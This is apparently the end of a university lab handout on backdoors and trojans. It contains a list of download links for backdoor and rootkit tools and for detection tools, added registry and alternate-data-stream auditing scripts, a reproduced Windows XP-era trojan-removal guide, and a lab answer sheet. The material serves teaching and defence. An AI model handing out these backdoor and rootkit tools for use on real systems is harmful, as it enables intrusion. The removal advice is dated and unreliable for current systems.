[1] Netcat - http://www.hackerscor.com/km/files/hfiles/ncnt090.zip
[2] iCMD - http://go8.163.com/lmqkkk/mytools/iCmd.exe
[3] RemoteNC - http://go8.163.com/lmqkkk/mytools/remotenc.zip
[4] Tini - http://go8.163.com/lmqkkk/mytools/tini.exe
[5] WinShell - http://go8.163.com/lmqkkk/mytools/Winshell4.0.zip
[6] CGI-backdoor - http://go8.163.com/lmqkkk/mytools/cgi.zip
[7] Remote Administrator - www.radmin.com
[8] TightVNC - http://www.tightvnc.com/download.html
[9] Rootkit v.0.44 - www.ndsafe.com/fires/rk_044.zip
[10] Rootkit v.0.40 - http://www.megasecurity.org/Tools/Files/Nt_rootkit0.40.zip
[11] IIP Driver - http://www.pedestalsoftware.com/intact/iipdriver.htm
[12] TCPview - www.winternals.com
[13] Fport - http://www.foundstone.com/knowledge/proddesc/fport.html
[14] Inzider - http://ntsecurity.nu/toolbox/inzider/
[15] Active Ports - http://www.ntutility.com/freeware.html
[16] Vision - http://www.foundstone.com/knowledge/proddesc/vision.html
[17] ListDlls - http://www.sysinternals.com/ntw2k/freeware/listdlls.shtml
[18] Process Explorer - http://www.sysinternals.com/ntw2k/freeware/procexp.shtml
[19] LANguard Network Security Scanner
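The registry autostart locations listed in Appendix A are the natural place to check after an exercise like Section 11, where WINDRV.HTA was dropped into the Startup folder. The following Python is an added example, not from the article or the lab: it reads a `reg export` dump, reports Run/RunOnce/RunOnceEx/RunServices entries that launch scripts or HTA files or run from user-writable and temp paths, and checks that the `exefile\shell\open\command` handler still has its stock value of `"%1" %*`. SAMPLE_REG is a constructed export (the real key names are spelled `CurrentVersion`, without the space shown in the article's list); the extension list and path markers are assumptions, not an exhaustive rule set.

```python
"""Audit autostart registry keys from a 'reg export' dump: flag Run-type entries
that launch scripts/HTA files or run from user-writable locations, and check the
exefile open handler. Added example; SAMPLE_REG is constructed."""
import re

AUTOSTART_SUFFIXES = ("\\run", "\\runonce", "\\runonceex", "\\runservices")
SCRIPT_EXTENSIONS = (".hta", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".bat", ".cmd", ".scr", ".pif")
USER_WRITABLE_MARKERS = ("\\documents and settings\\", "\\docume~1\\", "\\temp\\", "\\tmp\\")
EXEFILE_COMMAND_KEY = "hkey_classes_root\\exefile\\shell\\open\\command"
EXEFILE_DEFAULT = '"%1" %*'      # stock Windows value: run the file, pass the arguments through

# Constructed .reg dump: one legitimate entry, the Section 11 HTA, an executable
# hiding in a Temp folder, and an untouched exefile handler.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VMware Tools"="C:\\Program Files\\VMware\\VMware Tools\\VMwareTray.exe"
"windrv"="C:\\Documents and Settings\\student\\Start Menu\\Programs\\Startup\\WINDRV.HTA"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"updater"="C:\\DOCUME~1\\student\\LOCALS~1\\Temp\\svchost.exe"

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"
'''

VALUE_RE = re.compile(r'^(?:"(?P<name>[^"]*)"|(?P<default>@))="(?P<value>.*)"$')


def parse_reg_export(text):
    """Yield (key, value_name, string_value) for every REG_SZ value in a .reg dump."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_RE.match(line)
        if key and m:
            value = m.group("value").replace('\\"', '"').replace("\\\\", "\\")
            name = m.group("name") if m.group("name") is not None else "(Default)"
            yield key, name, value


def executable_of(command):
    """Best-effort program path from a Run-key command line (heuristic)."""
    if command.startswith('"'):
        return command[1:command.find('"', 1)]
    lower = command.lower()
    for ext in (".exe",) + SCRIPT_EXTENSIONS:   # unquoted paths may contain spaces
        pos = lower.find(ext)
        if pos >= 0:
            return command[:pos + len(ext)]
    return command.split()[0]


def audit_autostart(reg_text):
    """Return a list of findings, each {key, name, value, reasons}."""
    findings = []
    for key, name, value in parse_reg_export(reg_text):
        reasons = []
        low_key = key.lower()
        if low_key.endswith(AUTOSTART_SUFFIXES):
            exe = executable_of(value).lower()
            if exe.endswith(SCRIPT_EXTENSIONS):
                reasons.append("script/HTA launched at startup")
            if any(marker in exe for marker in USER_WRITABLE_MARKERS):
                reasons.append("runs from a user-writable or temp location")
        elif low_key == EXEFILE_COMMAND_KEY and value != EXEFILE_DEFAULT:
            reasons.append("exefile open handler changed from default")
        if reasons:
            findings.append({"key": key, "name": name, "value": value, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_autostart(SAMPLE_REG):
        print(f"{f['key']}\\{f['name']}: {f['value']}\n    {'; '.join(f['reasons'])}")
```

On a live system the input comes from `reg export HKLM\Software\Microsoft\Windows\CurrentVersion\Run out.reg` (and the other keys in the list); run the tool from trusted media, as the article advises, since a compromised host can lie about its own registry.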
Appendix B: Trojan Removal
http://forums.majorgeeks.com/showthread.php?t=35407
Introduction:
This article reflects countless hours of experience removing spyware, trojans and viruses. If you can take
the time to do all of these steps, there's a good chance your problem will be solved by following this
article. While all of these steps are not required for each case, they should be beneficial to all. In general,
these steps should work on all versions of Windows XP, but some may not apply to older operating
systems like Windows 98. If you need to post a new thread requesting support be sure you have done all
of these steps, tell us you did so, what symptoms you are experiencing and then follow any directions we
give you exactly. As you can see from reading some of the threads, people often ask for advice,
then only do bits and pieces. This will not help you; it will frustrate us and take more time than
required.
Section 1 makes sure your computer is not at risk for hard to remove viruses. Section 2 covers cleaning
and removal. Section 3 makes suggestions on securing your machine after clean up.
Complete ALL the applicable steps of Getting Prepared and then you MUST complete all 4 steps from
Scanning And Cleaning Steps.
Getting Prepared; Steps to be sure your system is ready to be scanned:
1: Disable System Restore temporarily (WinXP & WinME only) if you are infected; Any trojans, spyware,
etc. you may have picked up could have been saved in System Restore and are waiting to re-infect you.
Since System Restore is a protected directory, your tools can not access it to delete files, trapping viruses
inside. Please follow instructions to do that here: http://forums.majorgeeks.com/showthread.php?t=31668
2: Network Security, Workstation Netlogon Services & Remote Procedure Call (RPC) Helper (Windows
XP, 2K, NT); Only do this step if you have the about:blank or home search hijack. You need to
check to see if any of the following three Windows services are running:
- Network Security Service
- Workstation Netlogon Service
- Remote Procedure Call (RPC) Helper
To do this, click Start, Run, and enter the following in the Open box: "services.msc" (without the quotes).
Then click OK. Now, in the Services window that pops up look for exactly the following service
names (no others) "Network Security Service" or "Workstation Netlogon Service" or "Remote
Procedure Call (RPC) Helper". (NOTE: DO NOT DISABLE: Remote Procedure Call (RPC) or Remote
Procedure Call (RPC) Locator. They are both required services and are unrelated to the hijacker.). You
could have more than one of the 3 mentioned bad services, so look for all of them. If you find these
services, you must right click on it to bring up the service Properties window and do the following (refer to
the Figure too):
Step 1: Stop the service by clicking the Stop button.
Step 2: Now, disable it by changing the Startup type to Disabled and click Apply
If you do not find these exact services, do not worry and just skip this step. DO NOT DISABLE
ANYTHING UNLESS THE EXACT WORDING OF THE SERVICE NAMES IS MATCHED.
3: Enable viewing of hidden files and folders and extensions; Some programs can hide this way by not
being visible in Windows. Start Windows Explorer and click on your main hard drive, usually c:\. Then
select Tools from the top of Windows Explorer and then Folder Options. Go to the View tab. Scroll down
to the folder icon that says Hidden files and folders and check show hidden files and folders. Also, right
below it, uncheck the hide file extensions for known types. Not doing this could allow file extensions
commonly used by trojans and spyware to be hidden, for example a file ending in .exe or dll making
manually finding it, if needed, difficult to impossible.
4: Downloading Tools; Download the following tools and save in your favorite download folder or create
one, for example C:\Temp or C:\Downloads. And then install, update, and configure as indicated below.
While this may seem like overkill, there currently is no one perfect removal tool. Because of this, to
properly find and fix your problem, you need to try a variety of programs.
TIP: Create a folder on your C:\ drive for the tools/utilities you will need to use. For example: Navigate to
your C:\ folder and create a right click on a blank spot in the window > choose New > Folder. Name this
folder Spyware Tools. Now you can save the tools you will be downloading to this folder and if you prefer,
create sub-folders named for each individual utility.
Ad-Aware SE.......Install, click Check for Updates now and get any updates, then exit.
Ad-Aware VX2 Cleaner Plug-In.....Install only
CCleaner.............Install only, then exit
Spybot................Install, do the search for updates now and get any updates, then exit.
Spybot - Search and Destroy DSO Exploit Fix - Install this patch on top of Spybot to fix the DSO Exploit
bug
SpywareBlaster...Install, click Download Latest Protection Updates, Check for Updates, and then Enable
All Protection, then exit. It does a great job of blocking known vulnerabilities as well as known malicious
websites.
McAfee AVERT Stinger.....No installation required! Ready to run as is.
CWShredder......No installation required! Just unzip it to a folder.
Kill2me..............No installation required! Just unzip it to a folder.
about:Buster......No installation required! Just unzip it to a folder. Click Update and download any
before scanning.
HSRemove........No installation required! Ready to run as is. (Only for WinNT, 2K, XP)
Your system is now ready to be properly scanned for spyware, trojans and viruses.
Scanning And Cleaning Steps: (These 4 steps are NOT optional and must be run!!)
1: Virus And Trojan Scanning (do not skip these two scans or you will be asked to run them before
continuing)
a) Win9x (Windows 95, 98, 98SE) users boot normal mode.
- do an online scan at Trend Micro's Free Online Virus Scan
- do an online scan at Symantec Security Check
- now boot in safe mode (and remain there) and run McAfee AVERT Stinger. See how to boot in
safe mode below.
b) And Windows XP, 2000, NT, ME, users boot in "safe mode with networking support" (and remain in
there). See how to boot in safe mode below.
- do an online scan at Trend Micro's Free Online Virus Scan
- do an online scan at Symantec Security Check
- run McAfee AVERT Stinger
NOTE: If using a non-IE browser, you can use Trend Micro's online scan with Java located HERE
How to boot in safe mode: To boot into safe mode, restart your computer and tap the F8 key (after the first
black and white screen, but before the Windows splash screen) until you get to a black and white screen
asking you what to do. With Windows XP, 2000, NT, ME: use your arrow keys and select "safe mode with
networking support".
Booting in safe mode is important: it gives the best results because safe mode disables most
drivers and running programs. If for any reason you have a problem running these scans in safe
mode, do them in normal boot mode, but make sure you say so in any subsequent message you may
need to post about your problem.
Important Note Before continuing with scans:
To provide the greatest ability for the scanners to properly detect and remove all forms of malware, make
sure to close any other applications that are running on your system especially browsers before you run
these tools. It is in your best interest to follow this directive. So disconnect from the internet now and
close all browsers and any other applications you have running now and then continue with step 2 below.
2: Clean Your Hard Drive; Remove temporary internet and other files not needed with CCleaner. Run
CCleaner with the default options to clean out temporary files. Optionally, check the "Delete
Index.dat" checkbox. Only use the Windows tab and select Run Cleaner. Do not run any other options
from other tabs.
3: Main Spyware Scan And Removal; Scan your machine with Ad-Aware SE (remember to install the Ad-Aware VX2 Cleaner Plug-In for it) and Spybot. Look for the Immunize feature in Spybot and use it. Make
sure you install the Spybot DSO Exploit patch before running a scan with Spybot.
4: Secondary Spyware Scan And Removal: Other Removal Tools; Run the other programs you
downloaded: CWShredder (make sure you select Fix), Kill2me, about:Buster and HSRemove. They are
free, standalone and easy to use. Note: about:Buster and HSRemove need only be run if you are
having about:blank or HomeSearchAssistant hijacks. Also note that HSRemove is not compatible
with Win9x or WinMe systems.
37
OPTIONAL Steps (these require you to reboot back to normal mode):
1: OPTIONAL: If you cannot remove the stubborn "Only the Best" (aka "HSA") hijacker, please view this
thread by Chaslang, an expert in removing these things:
http://forums.majorgeeks.com/showthread.php?t=38772
2: OPTIONAL: Scan With Hijack This; If you have gotten this far without success, you may need to
download Hijack This!. Taking a few minutes to read this tutorial is required before posting a logfile so
that you can get the most from it and make it easier to diagnose. Please post your logfile as an
attachment and only when asked.
Make sure that you tell us in your post that you've already followed the instructions on this page
so we don't waste your and our time by posting a link to it in your thread. Also, it would be helpful
to indicate what kind of problems the above steps have found and fixed (or failed to fix).
Alternative Scans - If still having problems
If you are still having problems after performing all the above, these alternative scans below may prove to
be useful. As mentioned above, it would be good to perform these in safe mode since it may assist in the
ability to remove an infection. However, there are cases where a problem does not show itself completely
until you boot in normal mode. So first run these scans in normal boot mode, and if they have problems
cleaning any particular items repeat the scan in safe mode to see if it helps. Always keep track of what
these scans find (save logs or take notes), and report them back in your thread to anyone helping you.
Bitdefender online scan
RavAntivirus online scan <-- select Auto Clean then click Scan My PC
TrojanScan online scan
a-squared (a²) Free edition free but requires an email address to register
avast! Virus Cleaner Tool
ADS SPY - Alternate Data Streams Spy from Merijn
Recent browser hijackers started using ADS to hide their files, and very few anti-malware scanners detect
this. Use ADS Spy to find and remove these streams. Note: this app also displays legitimate ADS
streams. Don't delete streams if you are not completely sure they are malicious! You should consult
with an expert before deleting any files with this tool.
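As an added example (not part of the lab handout or the MajorGeeks guide it reproduces), the following PowerShell script enumerates NTFS alternate data streams under a folder and reports the ones that are not the primary data stream or the common Zone.Identifier mark, flagging any whose first two bytes are the "MZ" executable header. It assumes Windows PowerShell 3.0 to 5.1; the list of "known" streams is an illustrative assumption, and the script only reports, it deletes nothing.

```powershell
# Added example, not part of the lab handout or the MajorGeeks guide it quotes.
# Lists NTFS alternate data streams (ADS) under a folder and reports those that
# are not the primary ':$DATA' stream or the common Zone.Identifier mark.
# Assumes Windows PowerShell 3.0-5.1 (Get-ChildItem -File, Get-Item -Stream,
# Get-Content -Encoding Byte). It reports only; nothing is deleted.

# Streams that are normal on many files. Assumption: illustrative, not exhaustive.
$KnownStreams = @(':$DATA', 'Zone.Identifier')

function Test-MzHeader {
    # Returns $true when the named stream begins with the 'MZ' PE/DOS header.
    param([string] $File, [string] $Stream)
    $bytes = Get-Content -LiteralPath $File -Stream $Stream -Encoding Byte -TotalCount 2 `
             -ErrorAction SilentlyContinue
    return ($bytes.Count -eq 2 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A)
}

function Get-SuspiciousAds {
    param([Parameter(Mandatory)] [string] $Path)

    Get-ChildItem -LiteralPath $Path -Recurse -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            # -Stream * returns every stream on the file, including the primary one.
            Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $KnownStreams -notcontains $_.Stream } |
                ForEach-Object {
                    [pscustomobject]@{
                        File   = $file.FullName
                        Stream = $_.Stream
                        Length = $_.Length
                        # A stream holding a Windows executable is what hijackers
                        # hide this way; a hit still needs manual verification.
                        LooksLikeExe = (Test-MzHeader -File $file.FullName -Stream $_.Stream)
                    }
                }
        }
}

# Usage: review every hit before removing anything, as the guide advises.
# Remove-Item -LiteralPath <file> -Stream <name> deletes a single stream.
Get-SuspiciousAds -Path "$env:SystemRoot" | Format-Table -AutoSize
```

Legitimate software also writes alternate streams, so treat the output as a review list, not a delete list.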
Keeping your computer safe and secure:
1: Windows Update; Update Windows at Microsoft Windows Update. Just click on Start, then Windows
Update. Many security loopholes are found and exploited, and Microsoft releases patches for them. As an
example, millions of people were affected by the Blaster worm because they were not up to date. If you're
not up to date, you're at risk. You can set up automatic updates in your Control Panel: go to Start, Settings,
Control Panel.
2: Remove Microsoft Java; Microsoft's no-longer-supported version of Java is often a source of installed
spyware and hijacks, so it is a good idea to remove the Microsoft Java Virtual Machine and install Sun Java.
To remove it, follow these steps.
1: Select Start > Run and Enter "RunDll32 advpack.dll,LaunchINFSection java.inf,UnInstall" in the Open
box, and click ok.
38
2: Click Yes to confirm that you want to remove the Microsoft VM
3: When prompted, reboot the computer
4: Remove the following items (%Systemroot% is where Windows is installed, usually C:\Windows):
The %Systemroot%\Java folder
The file java.PNF from the %Systemroot%\inf folder
The files jview.exe and wjview.exe from the %Systemroot%\system32 folder
The registry subkey HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Java VM
The registry subkey HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExplorer\AdvancedOptions\JAVA_VM
OR
Download and run the MSJVM Removal Tool 1.0a
5: Install Sun Java here: http://java.com/en/
You can choose a different language if you need it from the top menu on that page.
(Any files or registry entries that are not found, and any errors, can be ignored; go on to the next step.)
Optionally, consider replacing your web browser with a free alternative like Firefox or a shareware
browser like Opera, for example.
39
ECE 4112 Internetwork Security
Lab 6: Backdoors and Trojans
Group Number: _________
Member Names: ___________________
_______________________
Answer Sheet
Q1.1.1. Is the binary file the same, or has it been altered? Compare the file sizes of the file on
the two systems as it is transferred back and forth.
Q1.1.2. What can you say about Netcat’s ability to transfer binary files?
Q1.1.3. What do you conclude from this?
Screenshot #1: Take a screenshot of these windows and submit it with your report.
Q1.1.4. Draw a diagram explaining how the relay works and the directions of data flow.
Q1.1.5. Aside from the four uses listed in this lab, Netcat can be used in many different ways.
Suggest another way that Netcat could be used (in detail).
Q1.1.6. What defenses could you use against an attack like a Netcat backdoor?
40
Section 2
Screenshot #2: Take a screenshot of the ethereal output.
Q2.1.1. What defenses could you use against an attack like an ICMP backdoor?
Q3.1.1. How would you detect that VNC was installed and/or running on your Windows
machine?
Q3.1.2. How would you detect that VNC was installed on your Linux machine?
Screenshots #3, #4: Take a screenshot of the VNC server screen and another of the VNC
viewer accessing the VNC server. Turn these in with your report.
Section 3
Q3.1.3 What defenses could you use against an attack like VNC?
Section 4
Screenshot #5: Submit a screenshot of BO2k successfully being used to gain access to the
password file of the WinXP victim.
41
Section 5
Q5.1.1. What happens when you do what the email says?
Q5.2.2. What suggestions do you have about improving the security of such email programs?
Screenshot #6. Take a screen shot of the remote access over the telnet connection and
hacked login.
Screenshot #7. Turn in a screenshot of the new process created.
Screenshot #8. Screen shot of the popup box with the path of the nc.exe program and
command line arguments.
Screenshot #9. Screenshot of the attacking machine running the ack tunneling attack.
Section 9: Port Knocking
1) Create an access rule to allow an OpenBSD 3.3-3.5 box on the non-routable 10.0.0.0/8
subnet to access port 22 using an encrypted knock sequence.
2) It was mentioned that port knocking began with a virus. Why would a virus writer want
to include port knocking in the backdoor?
42
3) No mention was made as to how port knocking servers finally close the open firewall
port. List 2 ways which could be employed to close the port.
Section 10. Tricking users into opening backdoors.
Q10.1.1 Does the notepad program appear after closing the calculator program?
Q10.1.2 Can you see notepad.exe in the processes window this time?
Q10.1.3 How do you detect a Trojan of this kind?
General Questions
How long did it take you to complete this lab? Was it an appropriate length lab?
What corrections and/or improvements do you suggest for this lab? You may cross out and edit
the text of the lab on previous pages to make corrections. Please be very specific, and if you add new
material give the exact wording and instructions you would give to future students in the new lab
handout. You need to be very specific and provide details. You need to actually do the suggested
additions in the lab and provide solutions to your suggested additions. Caution as usual: only extract
and use the tools you downloaded in the safe and approved environment of the network security laboratory.
Turn-in Checklist
1- Screenshots 1 to 9.
2- Answer Sheet with answers.
3- Any additions for the lab.
43